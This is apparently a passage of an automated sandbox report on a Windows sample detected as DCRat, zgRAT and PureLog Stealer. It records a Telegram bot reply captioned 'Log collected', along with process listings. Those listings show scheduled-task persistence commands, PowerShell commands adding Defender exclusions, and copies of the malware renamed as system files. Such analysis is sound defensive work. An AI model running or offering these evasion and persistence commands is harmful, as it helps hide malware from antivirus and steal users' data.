                                                                                                                                2025-01-11 14:03:05 UTC4096OUTData Raw: 62 9c 68 a6 31 b4 52 f4 a4 ef 48 62 63 e9 49 da 9c 78 a4 e9 40 c4 ef 41 e7 9e b4 51 c1 1f ce 81 88 45 07 d6 82 73 c5 1d bd 28 01 08 fc 40 a2 83 c7 bd 14 0c 31 8a 28 fc 68 c9 a0 04 fc cd 27 7e d4 a7 39 ed 47 34 0d 09 49 d6 97 1c f3 49 40 08 7b 50 7a d2 e3 f4 a4 3c 11 4c 60 69 08 e6 96 8c 7e 9e 94 80 4e b4 0a 39 a3 3f 85 31 88 28 14 be f4 94 00 7b f5 a3 8a 3a 7f 2a 33 40 c4 ee 3d e8 ff 00 3c d2 e2 83 40 08 7f 5a 0d 06 83 eb 40 09 41 e9 4b f8 52 50 30 ea 30 3d 7a 51 47 5e bf 9d 26 78 a0 02 8e bf 5a 51 49 d2 80 0a 4a 5c fe 02 92 81 81 3d 68 e9 c5 07 9a 09 a2 c0 07 df f5 a4 a5 3f 85 04 62 8b 00 9d 7d 28 ed 41 eb c7 e3 45 21 9d dd 14 b4 52 3e 58 4a 29 68 a0 04 a2 83 45 00 14 51 45 03 0a 4a 5a 28 01 28 a2 8a 06 14 51 4a 28 10 99 c5 14 b4 1a 00 28 a4 a2 98 0b 4b
                                                                                                                                Data Ascii: bh1RHbcIx@AQEs(@1(h'~9G4II@{Pz<L`i~N9?1({:*3@=<@Z@AKRP00=zQG^&xZQIJ\=h?b}(AE!R>XJ)hEQEJZ((QJ((K
                                                                                                                                2025-01-11 14:03:05 UTC4096OUTData Raw: 02 e6 de 6b 6f 87 5a 9a 4f a1 7f 63 31 9d 08 b7 fb 58 b8 dc 37 47 f3 ee 1d 33 d3 1e de f5 e7 b5 ec 3e 37 ff 00 91 3e fb fe d9 ff 00 e8 c5 af 1e af a6 c9 3f 87 2f 53 c2 cf e2 a3 3a 71 5d 82 8a 28 af 6c f0 02 8a 28 a6 02 82 69 77 f6 23 34 cc 51 4c 2c 3b e5 3e d4 9e 5f a1 cd 25 19 a0 04 28 47 51 4d a9 43 91 46 54 f5 5a 56 1d c8 a8 a9 36 21 e8 71 48 63 3d b9 a2 cc 77 23 34 53 88 23 b5 25 21 89 49 4b 45 00 25 14 b4 9d e9 8c 43 45 2d 25 00 25 14 b4 1a 06 25 25 2d 14 0c 4a 28 a2 80 0a 4a 5a 0d 00 36 8a 5a 28 18 da 29 71 9a 4a 63 12 8a 5c 51 40 5c 4a 29 68 a4 02 51 f8 51 45 00 25 21 a5 a2 81 89 45 06 8a 06 14 94 b4 94 00 52 52 d1 4c 77 1b 45 2d 25 03 10 d1 41 a2 80 10 d1 4b 47 7a 06 36 8a 5a 4a 06 06 92 96 90 d0 31 28 34 b4 94 00 94 62 8a 28 18 94 52 d2 50 31 29
                                                                                                                                Data Ascii: koZOc1X7G3>7>?/S:q](l(iw#4QL,;>_%(GQMCFTZV6!qHc=w#4S#%!IKE%CE-%%%%-J(JZ6Z()qJc\Q@\J)hQQE%!ERRLwE-%AKGz6ZJ1(4b(RP1)
                                                                                                                                2025-01-11 14:03:05 UTC25INHTTP/1.1 100 Continue
                                                                                                                                2025-01-11 14:03:06 UTC1570INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:06 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 1181
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                {"ok":true,"result":{"message_id":58,"from":{"id":8039401524,"is_bot":true,"first_name":"notifyer 1488","username":"notifyer1488bot"},"chat":{"id":6633994546,"first_name":"CATik","username":"CATik_DaDaDa","type":"private"},"date":1736604186,"photo":[{"file_id":"AgACAgEAAxkDAAM6Z4J6Gnz-DT_DT_Db1YkYwzEpiKUAAvmsMRs1OxBE_jNYP_fWN-QBAAMCAANzAAM2BA","file_unique_id":"AQAD-awxGzU7EER4","file_size":1335,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAM6Z4J6Gnz-DT_DT_Db1YkYwzEpiKUAAvmsMRs1OxBE_jNYP_fWN-QBAAMCAANtAAM2BA","file_unique_id":"AQAD-awxGzU7EERy","file_size":16686,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAM6Z4J6Gnz-DT_DT_Db1YkYwzEpiKUAAvmsMRs1OxBE_jNYP_fWN-QBAAMCAAN4AAM2BA","file_unique_id":"AQAD-awxGzU7EER9","file_size":69224,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAM6Z4J6Gnz-DT_DT_Db1YkYwzEpiKUAAvmsMRs1OxBE_jNYP_fWN-QBAAMCAAN5AAM2BA","file_unique_id":"AQAD-awxGzU7EER-","file_size":104108,"width":1280,"height":1024}],"caption":"Log collected\nID: 97cc84b2a0ed7ba855cc22809707dfd089d9f05 [TRUNCATED]


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:09:01:59
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\Udzp7lL5ns.exe"
                                                                                                                                Imagebase:0x2b0000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2053026799.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:09:02:02
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"
                                                                                                                                Imagebase:0x7ff6875e0000
                                                                                                                                File size:2'759'232 bytes
                                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:09:02:02
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:09:02:03
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED84.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP"
                                                                                                                                Imagebase:0x7ff6a7c00000
                                                                                                                                File size:52'744 bytes
                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:09:02:03
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"
                                                                                                                                Imagebase:0x7ff6875e0000
                                                                                                                                File size:2'759'232 bytes
                                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:09:02:03
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:09:02:03
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEF49.tmp" "c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP"
                                                                                                                                Imagebase:0x7ff6a7c00000
                                                                                                                                File size:52'744 bytes
                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                Imagebase:0xc70000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                                                                                                                                Imagebase:0xc50000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:24
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe
                                                                                                                                Imagebase:0xf00000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:25
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff65a430000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "Udzp7lL5nsU" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /f
                                                                                                                                Imagebase:0x7ff65a430000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:27
                                                                                                                                Start time:09:02:04
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                                                                Imagebase:0x30000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "Udzp7lL5ns" /sc ONLOGON /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff65a430000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:29
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files (x86)\windows mail\Memory Compression.exe"
                                                                                                                                Imagebase:0x840000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:31
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:32
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:33
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:34
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:35
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:36
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:37
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:38
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:39
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:40
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'
                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:41
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:42
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:43
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat"
                                                                                                                                Imagebase:0x7ff67bdc0000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:44
                                                                                                                                Start time:09:02:05
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:45
                                                                                                                                Start time:09:02:06
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:chcp 65001
                                                                                                                                Imagebase:0x7ff6f80f0000
                                                                                                                                File size:14'848 bytes
                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:46
                                                                                                                                Start time:09:02:07
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:ping -n 10 localhost
                                                                                                                                Imagebase:0x7ff75dbd0000
                                                                                                                                File size:22'528 bytes
                                                                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:47
                                                                                                                                Start time:09:02:07
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                Imagebase:0x1a0000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:48
                                                                                                                                Start time:09:02:07
                                                                                                                                Start date:11/01/2025
                                                                                                                                Path:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                Imagebase:0xa90000
                                                                                                                                File size:1'933'824 bytes
                                                                                                                                MD5 hash:3614F4C4B137E627F03D0118F4779D52
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
